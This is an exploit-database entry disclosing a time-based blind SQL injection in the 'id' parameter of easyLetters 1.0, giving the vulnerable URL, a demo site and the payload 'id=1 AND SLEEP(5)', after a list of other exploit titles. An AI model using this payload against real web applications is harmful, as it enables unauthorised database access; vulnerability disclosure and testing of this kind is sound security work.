
8 changes to exploits/shellcodes Symfony 2.7.0 < 4.0.10 - Denial of Service Employee Work Schedule 5.9 - 'cal_id' SQL Injection Ajax Full Featured Calendar 2.0 - 'search' SQL Injection EasyService Billing 1.0 - Cross-Site Request Forgery EasyService Billing 1.0 - Cross-Site Scripting EasyService Billing 1.0 - 'q' SQL Injection mySurvey 1.0 - 'id' SQL Injection easyLetters 1.0 - 'id' SQL Injection
21 lines
No EOL
626 B
Text
21 lines
No EOL
626 B
Text
# Exploit Title: easyLetters 1.0 - 'id' SQL Injection
|
|
# Dork: N/A
|
|
# Date: 25.05.2018
|
|
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
|
|
# Vendor Homepage: https://codecanyon.net/item/easyletters/5281396
|
|
# Version: 1.0
|
|
# Category: Webapps
|
|
# Tested on: Kali linux
|
|
====================================================
|
|
# Demo : http://pauloreg.com/newsletter/
|
|
# PoC : SQLi :
|
|
|
|
http://test.com/newsletter/e-mails.php?id=[SQLi]
|
|
|
|
Parameter: id (GET)
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind
|
|
Payload: id=1 AND SLEEP(5)
|
|
|
|
==================================================== |